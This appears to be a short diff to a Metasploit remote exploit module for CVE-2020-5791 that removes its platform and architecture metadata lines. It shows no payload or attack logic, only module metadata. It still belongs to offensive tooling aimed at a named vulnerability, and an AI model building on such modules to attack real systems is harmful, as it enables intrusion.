@@ -36,8 +36,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-5791'],
           ['EDB', '48959']
         ],
-        'Platform' => %w[linux unix],
-        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
         'Targets' => [
           [
             'Linux (x86/x64)', {
